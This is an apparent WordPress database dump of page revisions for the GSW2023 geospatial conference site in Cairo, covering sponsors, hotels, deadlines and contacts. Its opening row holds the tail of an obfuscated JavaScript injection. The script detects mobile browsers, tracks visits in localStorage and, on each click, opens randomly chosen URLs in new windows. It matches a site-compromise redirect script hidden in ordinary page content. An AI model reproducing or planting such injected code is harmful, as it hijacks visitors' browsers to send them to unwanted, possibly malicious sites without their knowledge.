3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-27 02:12:04','2023-05-27 02:12:04','',3066,'https://gsw2023.com/?p=4587',0,'revision','',0),
(4588,1,'2023-05-27 03:04:16','2023-05-27 03:04:16','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 